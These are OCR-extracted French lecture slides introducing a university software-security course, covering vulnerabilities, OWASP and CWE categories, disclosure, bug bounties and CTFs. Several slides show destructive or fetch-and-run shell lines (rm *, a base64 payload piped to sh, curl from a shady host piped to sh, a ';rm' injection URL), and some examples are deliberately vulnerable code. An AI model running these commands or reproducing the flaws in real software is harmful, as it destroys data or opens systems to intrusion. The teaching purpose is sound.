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Introduction 


Sécurité au niveau logiciel 


e Code source 
e Programmation 


Angle de l'exploitation 


e Trouver des bugs 
e Exploiter des bugs 


Objectifs 
e Comprendre comment on peut attaquer du logiciel (pour de vrai) 
e Apprendre à programmer mieux 
e Être capable de comprendre les alertes de sécurité logicielle 
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Un nouveau cours 


Nouveau cours à l'UQAM 
e Soyez indulgent 


Volonté des étudiants 
e Hubert Hackin' 


Pas actuellement un domaine universitaire 
e Cours unique au monde? 
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Modalités du cours 


Laboratoires Concrets 
Dans un environnement dédié 
On peut attaquer et briser des choses 
Importants 
Obligatoires 
e Matière spécifique 
Note: C'est la partie amusante 


Alexandre et Luis-Gaylor 


e Demos et correcteurs et bénévoles 
e Personnes ressources 

e Membres de Hubert Hackin’ 

e ageei-uqam.slack.com #inf600c 
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Plan du cours 


Partie 1 : Haut niveau 
Bases générales 
Système d'exploitation 
Web et réseau 

Crypto 

Forensique 


Partie 2 : Bas niveau 
e Rétro-ingénierie 
e Débogage et exécution contrôlée 
e Exploitations binaires 
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Domaines et technologies 


On se concentre sur le point de vue du développeur humain et 
sur ses programmes 


On essaye d'être généraliste 
e multiples technologies 


e multiples langages 
e multiples domaines 


Seule exception 


On se concentre sur des systèmes Linux modernes 
e c'est majoritaire dans les serveurs 
e les problèmes sont clairement documentés 
Note ce n'est pas un cours de Linux. 
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Hors du cours 


Les problèmes de configuration 

L'administration système et réseau 

L'ingénierie sociale et le hameçonnage (phishing) 

Les mauvais mots de passe et la divulgation volontaire de secrets 
Les virus, chevaux de Troie, rançongiciel, etc. 

La violence et la sécurité physique 
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Sécurité physique 
A CRYPTO NERD'S 
IMAGINATION : 
HIS LAPTOPS ENCRYPTED. 


LETS BUILD À MILLION-DOLLAR, 
ni ER TO CRACK IT. 


WHAT \WOULD 
ACTUALLY HAPPEN: 


HIS LAPTOP'S ENCRYPTEND. 
DRUG HIM AND HIT HIM WITH 
THIS $5 WRENCH UNNL 
HE TEUS US THE PASSMORD. 


\ GOT IT. 
f À 
Source: https://xkcd.com/538/ 
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NO Go0D! IT'S 
. -BIT M 


. Ru 
15 FOILED! 


Evaluations 


Examens 
e Intra 25% 
e Final 25% 


TP 
e TP1 20% 
e TP2 20% 
e TPS 10% 
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Sécurité Informatique — Cybersécurité 
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En général 


INTO THE CMPUTERS || SOMEONE TORE DOWN 
OF THE CA! A POSTER HUNG UP 


Source: https://xkcd.com/932/ 
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Vaste domaine 


)/ 
| 
= © 
! 
(sur cos sur) _— -(GnisFiov sr) 


f à 
\, 


Source: Henry Jiang, CISO and Managing Director 
at Oppenheimer & Co. Inc. 
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Le maillon faible 


IN THIS COPNER WE HAVE d 
FIREWALLS, ENCRYPTION, 
ANTIVIRUS SOFTWARE , ETC. 
AND IN THIS CORNER, L : 
VE HAVE DANE // 


2006 John Klossner w 


Source: http://www.jklossner.com/ 
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Sécurité Applicative 


On s'intéresse à la sécurité au niveau du logiciel 
e Qu'est-ce qu'une faille de sécurité? 
e Comment l'exploiter? 
e Comment la corriger? 

Pour des programmeurs, par des programmeurs 
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Comment on va s'y prendre 


Schéma du cours 
e Exposer des vulnérabilités 
e En attaquant des trucs 
— C'est des preuves directes 


Pédagogique 

Comprendre les failles 
Comprendre les attaques 
Pouvoir rejouer 

Pouvoir généraliser 
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OK2N! TM GONG 
1o HACK THE 
DATAa82sE !! 


INF600C 


Hiver 2019 
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AND THERE NE Go" WHO, THIS 
LOOKS HARD 


how to hack databases 


Source: http://nedroid.com/2012/05/honk-the-databus/ 
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Selon Google Image Search 


Le Hacker Mythique (2) 


CHAR ! 4 ALLMAN 
THE LAST MI HACKER 
= . 
https://www.youtube.com/watch?v=y1DFwtR755l 
« love of excellence in programming » 
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Le Mythe du Hacker (3) 


2 ef \ 
à p à 
n. < Re 
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Hacker des trucs, c'est mal! 


Comment apprendre ça en toute légalité? 


Les cours (c'est nous!) 


e Les cours de sécurité appliquée sont rares 
e Se concentrent surtout sur l'exploitation binaire 


Capture The Flag (CTF) 


e Des gens exposent des failles de façon ludique 

Le logiciel et l'environnement sont dédiés et contrôlés 
Level design: la faisabilité des épreuves est idéale 

Les challenges sont variés et originaux 


Les bounties 
e Etre payé pour trouver des bugs 
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Sécurité logicielle 
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Comment fonctionne un logiciel? 


Données 


e Idée Code source Exécution 
Ce) 


| 


Programmeur « Écriture » « Toolchain » | Ordinateur 
Résultats 
e Un programme s'exécute de façon conforme à sa spécification 
(son code) 


e Le comportement d'un programme dépend de ses données 
(et de son environnement) 
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On two occasions | have 
been asked, — “Pray, Mr. 
Babbage, if you put into 
the machine wrong figures, 
will the right answers 
come out?” | am not able 
rightly to apprehend the 
kind of confusion of ideas 
that could provoke such a 
question. 


Charles Babbage, 
Passages from the Life of 
a Philosopher (1864) 
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Fragilité logicielle 


Le maillon faible 
C'est l'humain 
e « Idée »: bugs de conception 
e « Écriture »: bugs d'implémentation 


Bug (bogue) 
e défaut de conception 
e d'un programme informatique 
e à l'origine d'un dysfonctionnement 
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Exemple de bug 


e « Va au supermarché acheter une bouteille de lait. 
Et si ils ont des œufs, prends en 6. » 
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Exemple de bug 


e « Va au supermarché acheter une bouteille de lait. 
Et si ils ont des œufs, prends en 6. » 


e « Va au supermarché acheter une bouteille de lait. 
Et tant que t'y es, prends des œufs. » 


Jean Privat (UQAM) Introduction à la sécurité logicielle INF600C Hiver 2019 27/85 


It's not a bug, it's a featurel 


OUR cree N 


(5 BUG-LADEN CREATING A 
AND RIDDEN Mis 
(TH HOLES. 
re FOR OUR 
SECURITY 
APP/ 


Source: http://www.jklossner.com/ 


Introduction à la sécurité logicielle 
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Vulnérabilités logicielles 
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Vulnérabilité? 


© «rm *} ? 
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Vulnérabilité? 


© «rm *» ? 
® «echo cmOgKgo= | base64 -d | sh) ? 
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Vulnérabilité? 


® «rm *» ? 
® «echo cmOgKgo= | base64 -d | sh} ? 
® «curl http://wwuw.shäddy.xyz/rmstar.sh | sh} ? 
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Vulnérabilité? 


{rm *» ? 

{echo cmOgKgo= | base64 -d | sh» ? 

{curl http://www.sh4ddy.xyz/rmstar.sh | sh) ? 
{curl 'http://localhost/check.php?host=;rmt*'} ? 
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Vulnérabilité (faille) 


Définition 
e Faiblesse dans un système informatique 
e permettant à un attaquant 
e de porter atteinte à l'intégrité/confidentialité du système 


3 éléments nécessaires 
e Des bugs 
e L'accès au système 
e La capacité d'exploitation 
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Risque des vulnérabilité 


Risques techniques 
e Bris de services (denial of service, DoS) 
e Vandalisme 
e Divulgation d'information (information disclosure) 
e Fuite de données (data leakage) 
e Augmentation de privilège (privilege escalation) 
e Exécution arbitraire de code 


Risques économiques (Business) 


Direct (perte de revenu) 

Mise-à-jour/réparation des système 

Réputation 

Assurance 

Amendes pour non-conformité (regulatory compliance) 
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Exploitation 


Exploiter 
«Se servir de façon abusive de quelque chose à son avantage.» 
— Un dictionnaire 
Pervertir le résultat de l'exécution 
e Contrôle des données 
e Contrôle de l'environnement 


Exploit 
Moyen de l'exploitation 
e Donnée (payload) 
e Séquence de commandes 
e Morceau de code / script (exploit) 
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Risque 


Selon OWASP (Open Web Application Security Project). 
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Quelques Fragilités Communes 
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Code.soue: auth ha = $function = "" 


2 $is_auth = false 

3 def login # Use guest:guest as guest account 
4 $username = input ('"user?") 

5 $password = input ("pass?") 

6 if validate($username, $password) then 

7 

8 


$is_auth = true 

end 
9 end 
10 def secret 
11 if $is_auth and $username == 'admin' then 
12 print _file("secret.txt") 
13 end 
14 end 
15 while true do 
16 $function = input ('"function?") 
17 if $function == "login" then login end 
18 if $function == "secret" then secret end 
19 end 
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Codersourse:.Auth? java 


2 
3 
4 
5 
6 
7 
8 
9 
10 
11 
12 
13 
14 
15 
16 
17 
18 
19 
20 


Boolean isAuth = false; 

String user = null; 

void login() { 
isAuth = false; user = null; 
String name = input ('"user?"); 
String pass = input ("pass?7"); 
if (validate(name, pass)) 

isAuth = true; user = name; 

} 

void secret() { 
if (user != null && user.equals('"admin")) 


printFile("secret.txt"); 
} 
void start() { 
while(true) { 
String action = input("action?"); 
if (action.equals('"login")) login(); 
if (action.equals('"secret")) secret (); 
} 
} 
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Codersourge:.Auths java 


2 String user = null; 

3 void login() { 

4 user = null; 

5 String name = input ('"user?"); 

6 String pass = input ("pass?"); 

7 if (validate(name, pass)) 

8 user = name; 

9 } 

10 boolean isTrusted() { 

11 if (user == null) return false; 

12 if (user == "admin") return true; 
13 if (user == "guest") return false; 
14 if (user == "anonymous") return false; 
15 if (user == "steve") return false; 
16 return true; 

17 } 

18 void secret() { 

19 if (isTrusted()) 

20 printFile('"secret.txt"); 

21 F 
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Erreur de logique, de langage, d'API 


e Ce sont des bugs de base (souvent INF1120) 
° qui ont un effet sur la sécurité du système 


Contre-mesures 
e Programmer correctement 
e Tests unitaires 
e Assurance qualité (QA) 
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Codersourse:.Auth4 java 


2 
3 
4 
5 
6 
7 
8 
9 
10 
11 
12 
13 
14 
15 
16 
17 
18 
19 
20 


String user = null; 
void login() { 

user = null; 

String name = input ('"user?"); 

String pass = input ("pass?7"); 

if (validate(name, pass)) user = name; 
} 


private final static String[]l untrusted = 
{'anonymous", "guest", "steve", "bob'"}; 
boolean isTrusted() { 
if (user == null) return false; 
for (int i = untrusted.length-1; i>0; i--) { 
String bad = untrusted[il; 
if (user.equals(bad)) return false; 
} 
réturnairue ; 
} 
void secret() { 
if (isTrusted()) printFile("secret.txt"); 
Fr 
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Off-by-one error 


There are only two hard things in Computer Science: cache 
invalidation, naming things, and off-by-one errors. 
— Phil Karlton + anonymous patch 
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Code source: check.php 


<?php 

# get the host parameter 

$host = $_GET['host']; 

if($fhost) { 
# check the host with the ping(8) command 
system("ping CM" -w 1 J'MMShost).: 

} 

?> 

<form method=get?> 

<input type=text name=host> 

11 <input type=submit> 

</form> 


© © —J OO O1 À © N° H 


Ha 
[e] 


Ha 
N 


Jean Privat (UQAM) Introduction à la sécurité logicielle INF600C Hiver 2019 42/85 


Injection de code/commandes 


Problème de sécurité n°1 depuis toujours [OWASP] 


° très exploitable 
e assez prévalent 
e très détectable 
e très dangereuse 


Tous les langages 


system, exec 

eval 

désérialisation 

requête SQL 

injection de patrons (template) 
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Injection SQL 


HI, THIS 15 OH, DERR - DID HE | DID YOU REALLY WELL, WEVE LOST THIS 
YOUR SON'5 SCHOOL. | BREAK SOMETHING? | NAME YOUR SON YEARS STUDENT RECORDS. 
VERE HAVING S0ME IN À WAY= Robert‘); DROP I HOPE YOURE HAPPY. 
COMPUTER TROUBLE. TABLE Students; -- ? 


À AND I HE 

, à — OH.YES LME SC YOUVE LERRNED 
BOBBY TABLES, TO SANTE YOUR 
| | | | | | WE CAL HM. DATABAE INPUTS. 
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Injection: Contre-mesures 


Comment les détecter 
e Interne: chercher les commandes/fonctions dangereuses 
e Externe: tester les caractères spéciaux et délimiteurs 


Comment les prévenir 


e Arrêter d'utiliser des API peu sécuritaires 
e Échapper correctement les caractères de contrôle 
(input sanitization) 
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arecover.pl 


1 sub recover { 

2 srand time; 

3 my $code = int rand 100; 

4 sendsms ("Votre code est $code"); 

5 print "Un code secret vous a été envoyé par sms.\n", 
6 "Entrez-le pour confirmer votrefidentatér ‘; 
7 my $in = <STDIN>; 

8 if ($in == $code) { 

9 print "Bon code\n'; 

10 return true; 

11 Prelse 

12 print "Mauvais code\n"; 

13 return false; 

14 } 

15 } 
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Génération pseudo-aléatoire (PRNG) 


Divination 
Pour être sécuritaire, un nombre aléatoire ne doit pas être 
prédictible. 
e les fonctions aléatoires par défaut (rand) sont facilement 
prédictibles 


Contre-mesures 
e préférer les grands intervalles de valeurs (> 32 octets) 
ne pas seeder à chaque fois 
ne pas seeder avec des secondes 
utiliser des générateurs aléatoires cryptographiques (sans seed) 
limiter le nombre d'essais (anti force brute) 
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Génération pseudo-aléatoire 


int _ get RondomNumber () 
return 4: // chosen bu fair dice roll. 


/ guaranteed to be random. 


https://xkcd.com/221/ 


TOUR OF ACCOUNTING sl are 

s| Vou THAT'S THE 

OVER HERE 2] SURE 

UE HAVE OUR S| THATS DOMNESS : 

RANDOM NUMBER 2 | RANDOM? 

GENERATOR.. ù  - 
SURE. 
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Mitigation et Contre-mesures 
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Prévenir 


Programmer correctement 


e Bonnes pratiques 
e Assurance qualité 
e Formations spécifiques 


Protéger 


e Réduire la surface d'attaque 
e Isoler les composants 
e Durcissement (hardening) 


Valider 
e Audits de code 
e Outils d'analyse et de preuves 
e Tests d'intrusion (pen test): attaques simulées et autorisées 
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CERT — Norme de développement 


Permet d'éviter les bugs, les failles de sécurités communes et les 
comportement indéfinis 

° https://www.cert.org 

e wiki https://wiki.sei.cmu.edu 


Orientée Pratique 


e Règles de développement 
e Exemples de mauvais code avec correction 


Plusieurs langages 
e C/C++ 

Java 

Android 

Perl 
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Failles communes et bonnes pratiques 


Common Weakness Enumeration (CWE) 


e https://cwe.mitre.org/ 
e Base de données des faiblesses 
e Associée avec les normes CERT 


Exemples: 


CWE-78: OS Command Injection (check.php) 

CWE-193: Off-by-one Error (Auth4. java) 

CWE-334: Small Space of Random Values (arecover.p1) 
CWE-337: Predictable Seed in PRNG (arecover.p1) 

CWE-338: Use of Cryptographically Weak PRNG (arecover.p1) 
CWE-483: Incorrect Block Delimitation (Auth2. java) 
CWE-597: Use of Wrong Operator in String Comparison 

(Auth3 .java) 
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Open Web Application Security Project (OWASP) 


e https://www.owasp.org 
e Communauté en ligne (OSBL) 
e Sécurité des applications web 


Top 10 OWASP 

A1:2017-Injection 

A2:2017-Broken Authentication 
A3:2017-Sensitive Data Exposure 
A4:2017-XML External Entities (XXE) 
A5:2017-Broken Access Control 
A6:2017-Security Misconfiguration 
A7:2017-Cross-Site Scripting (XSS) 
A8:2017-Insecure Deserialization 
A9:2017-Using Components with Known Vulnerabilities 
A10:2017-Insufficient Logging& Monitoring 
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OWASP A1:2017-Injection 


« Des erreurs d'injection, telles que l'injection SQL, NoSQL, OS et 
LDAP, se produisent lorsque des données non fiables sont envoyées à 
un interpréteur dans le cadre d'une commande ou d'une requête. Les 
données hostiles de l'attaquant peuvent amener l'interpréteur à 
exécuter des commandes inattendues ou à accéder aux données sans 
autorisation appropriée. » 

(cf. check.php) 
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OWASP A2:2017-Broken Authentication 


« Les fonctions d'application liées à l'authentification et à la gestion 
de session sont souvent incorrectement implémentées, permettant 
aux pirates de compromettre les mots de passe, clés ou jetons de 
session, ou d'exploiter d’autres failles d'implémentation pour prendre 


temporairement ou définitivement les identités des autres utilisateurs. 
» 


(cf. auth,rb, Auth2.java et arecover.pl) 
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OWASP A5:2017-Broken Access Control 


« Les restrictions sur ce que les utilisateurs authentifiés sont autorisés 
à faire ne sont souvent pas correctement appliquées. Les attaquants 
peuvent exploiter ces failles pour accéder à des fonctionnalités et/ou 
des données non autorisées, telles que l'accès aux comptes d'autres 
utilisateurs, l'affichage de fichiers sensibles, la modification des 


données d'autres utilisateurs, la modification des droits d'accès, etc. 
» 


(cf. Auth3.java et Auth4. java) 
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OWASP A9:2017-Using Components with Known 
Vulnerabilities 


« Les composants logiciels, tels que les bibliothèques, les frameworks 
et autres modules logiciels, fonctionnent avec les mêmes privilèges 
que l'application. Si un composant vulnérable est exploité, une telle 
attaque peut faciliter la perte de données ou la prise de contrôle du 
serveur. Les applications et les API utilisant des composants 
présentant des vulnérabilités connues peuvent compromettre les 
défenses de l'application et permettre diverses attaques et impacts. 
(cf. arecover.pl) 
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Régulations 


Des certifications (ou la loi) peuvent imposer 
e des objectifs. 
e des obligations. 
e des moyens (rarement). 


Exemples 
e États-unis: Régulation de la gestion de la santé, les institutions 
financières et les agences fédérales 
e Europe: Règles pour la protection de la vie privée (GDPR) 
e Canada: Digital Privacy Act (2015) 
e Payment card industry (PCI) Data Security Standard 
https://www.pcisecuritystandards.org/ 
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Veille et alertes de sécurité 


Common Vulnerabilities and Exposures (CVE) 


https://cve.mitre.org 

Standard international actuel 

Base de données identifiant des vulnérabilités précises 
Exemple: CVE-2014-0160 Heartbleed (faille dans OpenSSL) 


National Vulnerability Database (NVD) 


e https://nvd.nist.gov/ 

e Base de donnée du gouvernement des États-Unis — National 
Institute of Standards and Technology (NIST) 

e Étend CVE avec des détails et méta-données (dont un score) 

e Compromise en 2013 à cause d'une faille logicielle 
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Low [I 
Meoium QE] 
Hc+ [I 


Distribubon 


ë 
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2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014 2015 2016 2017 2018 2019 


Source: National Vulnerability Database 
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Bulletins et alertes de sécurité 


e Les compagnies et organisations offrent 
e des canaux de communication et base de données dédiés 
e pour leurs produits spécifiques 
Contenu 
e Quelles sont les failles et leurs impacts? (liens avec les CVE) 
e Quelles versions sont affectées? 
e Quelles mises-à-jour faut-il faire? 
e Quelles mitigations apporter? 
Quelques ressources 
e Debian Security Advisories (DSA) 
Red Hat Security Advisories (RHSA) 
Ubuntu Security Notices (USN) 
Cisco Security Advisories 
Microsoft Security Advisories and Bulletins 
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Sécurité par l'obscurité 


e Politique de protection d'un système basée sur la 


non-divulgation d'informations techniques et des 
vulnérabilités connues 


Origine (contestée): newsgroups Usenet qui se moque des politiques 
de sécurité de HP/Apollo. 


Principe de Kerckhoffs (1883) 


e Un cryptosystème devrait être sécuritaire même si toute 
l'information à propos du système est publique à l'exception de 
la clé. 


Exemples 


e Content Scrambling System des DVD 
e Les machines de vote électroniques américaines 
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Sécurité par l'obscurité 


Sentiment de sécurité 
NIST: « La sécurité d'un système ne doit pas dépendre du secret de 
l'implémentation ou de ses composants. » 


Sécurité par l'obscurité en génie logiciel 

Ne pas diffuser le source. Exemple: logiciels propriétaires. 
Offuscation de code. Exemple: JavaScript. 

Chiffrement de programmes. 

Protection anti-débogueurs. On verra ça plus tard. 
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Un peu d'obscurité quand même? 


Cacher les secrets 
e Garder secret: mots de passes, clés, jetons, etc. 
e Ça ne fait pas partie du système 
e Ils sont facilement remplaçables, si compromis 


Réduire la surface d'attaque 


NIST: « Pour les serveurs externes, reconfigurez les bannières de 
service pour ne pas signaler le type et la version du service et du 
système d'exploitation, si possible. 

Cela décourage les attaquants novices et certaines formes de logiciels 
malveillants, mais cela ne dissuadera pas les pirates plus expérimentés 
d'identifier le type de serveur et de système d'exploitation. » 
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Recherche et Divulgation 
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Recherche de vulnérabilités 


Domaine empirique 


e Méthodes, techniques et outils en progrès constant 


e Difficile d'anticiper la découverte de failles futures et leurs 
impacts 


Expertise 
Les experts en sécurité 


e comprennent le fonctionnement des systèmes 
e connaissent les faiblesses et attaques 


e sont capables de trouver et d'exploiter les bogues des autres 
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Détecter (analyse de logs) 


robm@homebox -$ sudo su 
Password: 


robm is not in the sudoers file, 
This incident will be reported. 
robm@homebox -$ E 


S'ITTTT Tr. 


Source: https://xkcd.com/383 
OWASP A10:2017-Insufficient Logging&Monitoring 
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Chronologie habituelle 


e Temps À: une équipe de sécurité (white hat) découvre une 
faille ou une attaque d'un logiciel d'un fournisseur (et réserve 
un ou plusieurs CVE) 

e Temps B (zero-day): l'équipe étudie et documente dans une 
publication (diffusion). 

Le fournisseur commence à étudier la faille. 

° Temps Bbis: un exploit est actif (voire publié) 

e Temps C: le fournisseur publie des correctifs (mises-à-jour de 
sécurité). 

Attention aux produits plus supportés. Exemple Windows XP 
Contre-exemple: màj contre EternalBlue (WannaCrypt) en 2017 
e Temps D: la majorité des utilisateurs ont leur logiciel mis à jour 
Fenêtre de haute vulnérabilité: Période entre le temps Bbis et D 
où les systèmes sont le plus vulnérables 
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Divulgation Totale (full/open disclosure) 


L'équipe de sécurité diffuse toute l'information (y compris les exploits 
éventuels) au plus tôt et au plus de monde. 


Avantages 


e Les victimes potentielles sont informées au plus tôt, 
et peuvent se protéger au plus tôt 
e Force les fournisseurs à réagir 


Inconvénients 
e La fenêtre de haute vulnérabilité est la plus longue 
e C'est illégal dans certains pays 


France: depuis la Loi pour la confiance dans l'économie 
numérique (LCEN) 2004 
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Divulgation Coordonnée (responsible disclosure) 


L'équipe de sécurité ne publie pas tout de suite mais contacte les 
fournisseurs et se coordonnent 


Avantages 
e Les fournisseurs trouvent de meilleurs corrections (sans 
précipitation) 
e La publication et les mises-à-jour logicielles sont synchronisées: 
pour réduire la fenêtre de haute vulnérabilité 


Inconvénients 
e La faille est connue d'un groupe plus où moins petit de 
personnes 
— risque de fuite 
e Le développement des mises-à-jour des logiciel peut révéler le 
pot aux roses (suivi des commits) 
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Zero-day 


e Zero-day: le moment ou le fournisseur est informé de la 
vulnérabilité (et devrait la corriger). 
e Vulnérabilité zero-day: une vulnérabilité pas encore connue du 


fournisseur 
e Exploit zero-day: un exploit qui vise une vulnérabilité zero-day 


Marché noir et trafic 
Si l'équipe est mal intentionnée (black hat) elle peut: 
e utiliser la vulnérabilité pour son profit propre 
e vendre la vulnérabilité ou l'exploit sur le marché noir 
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Non divulgation 


Divulguer c'est risquer d'être poursuivi 
e Serge Humpich: 10 mois avec sursis en 2000 (entrevue 1999) 
e Eric McCarty: 6 mois de détention à domicile en 2006 
«Keep (vulnerabilities) to yourself-being a good guy gets you 
prosecuted.» (article 2006) 
e Pascal Meunier «Reporting vulnerabilities is for the brave» 
(article 2006) 


Problème d'expertise illégale 
e Au Def Con 2012, Keith Alexander chef de la NSA, fait un 
keynote où il dit «From my perspective, what you guys are doing 
to figure out vulnerabilities in systems is absolutely needed.» et 
la foule de répondre « Then stop arresting us!» 
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Bug Bounty 


Récompense ($) et reconnaissance 

Offerte par une entreprise/un organisme 

Pour des failles de sécurité (et parfois d'autres bugs) 
Dans un ensemble de logiciels et systèmes donnés 


Origine: Netscape 1995 


Avantages pour la société 


moins cher que du pentesting régulier 
crowdsource la sécurité: 24h 7) 

on ne paye que les bugs (pas le temps) 
concurrence le marché-noir 

bonne publicité 
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Bug Bounty 


Avantages pour l'informaticien 
Se faire les dents 

sur des vrais systèmes 

en production 

de vraies entreprises 

en toute légalité 


Agrégateurs 

e https://firebounty.com/ 

e https://www.bugcrowd.com/bug-bounty-list/ 

e https://www.vulnerability-lab.com/list-of-bug-bounty- 
programs.php 
https://internetbugbounty.org/ 
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GIF 
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Capture The Flag (CTF) 


Compétition de (in)sécurité informatique 


Offensif 
Des systèmes informatiques vulnérables sont conçus par les 
organisateurs. Avec: 
e Avec du scénario 
Du level-design 
Des indices 
Un niveau de faisabilité calibré 


Flag — secret 
e Des secrets à découvrir 
e Matérialisés dans les systèmes sous la forme de flags (drapeaux) 
e Les flags sont cachés mais évidents quand trouvés 
Exemple: FLAG{fLAG_M4Y_CONt41N_L4M3_PuNz} 
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Objectifs 


Flag — points 
Les objectifs sont: 
e découvrir (capturer) les flags des systèmes 
e les soumettre au système de score (scoreboard) pour gagner des 
points 
L'analogie est de vendre de l'information secrète contre des points. 


Pourquoi c'est intéressant ? 


e Imaginer des ruses pour abuser de failles des programmes et leur 
faire faire des choses à notre avantage 
Eh! Ça ressemble au cours et aux laboratoires, non? 
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Formats des CTF 


e Généralement en équipe 

e En ligne ou sur place 

e Généralement limité dans le temps (souvent 48h une fin de 
semaine) 


Jéopardy 
e Des épreuves indépendantes valant plus où moins de points 
e Catégories variées: cryptographie, stéganographie, 
rétro-ingénierie, exploitation binaire, exploitation mobile, 
exploitation web, forensique, programmation haute performance, 
recherche d'information (recon) 


PvP 


e Blue Team/Red Team: une équipe attaque, une équipe défend 
e Attaque/Défense: chaque équipe se bat avec les autres 
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CTF - C'est Très Formateur 


C'est difficile 

e Multidisciplinaire 

e Volontairement difficile et étrange 

e Souvent pointu et spécialisé 

e Nécessite d'apprendre et de comprendre vite 
Ça force l'humilité: échouer c'est aussi apprendre 
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CTF - Préparation 


e Faire des épreuves en ligne 
Lire les write-ups 
un write-up est une courte explication de la solution trouvée par 
quelqu'un. 
Destiné à expliquer quels indices, fragilités et vulnérabilité ont 
été trouvés; ce qui a été tenté; ce qui a réussi; et éventuellement 
l'explication de pourquoi ça a fonctionné. 

e Suivre un cours de sécurité logicielle (Bonus +100) 

e S'intégrer à un groupe de CTF 

Voir les ressources sur le site du cours. 
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Travaux pratiques 


TP1 et 2: Style CTF (20% chacun) 


e Exercices indépendants (style lab) 
e En équipe de 2 (maximum) 
e À remettre: 
e les flags 
e les write-ups — explication de la méthodologie 
® des corrections — proposition d'amélioration du code 


TP Spécial: Vrai CTF (10%) 
e Participation à un vrai CTF 
e En équipe de 2 (maximum) 
e À remettre: 


® les write-ups — explication de la méthodologie 
° les flags (éventuels) 
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Publicité —- CS-Games 
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CS-Games - Quoi? 


Compétition inter-universitaire 
Nord-est américain 

ler cycle 

% 30 équipes 
https://2019.csgames.org/fr/ 


Jean Privat (UQAM) Introduction à la sécurité logicielle INF600C Hiver 2019 83/85 


CS-Games - Format? 


e Épreuves en blocs de 3h 
e 2-3 personnes par équipe 
e Autres épreuves 
Plein de catégories +/- universitaires 
e |A, prog, algo, OS, sécu, théorique, prog, jeux vidéos, prog, etc. 
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CS-Games - Équipes UQAM 


AGEEI 
e Coordination 
e Séances d'entraînement 
e Qualifications (bientot?) 
— #cs-games 
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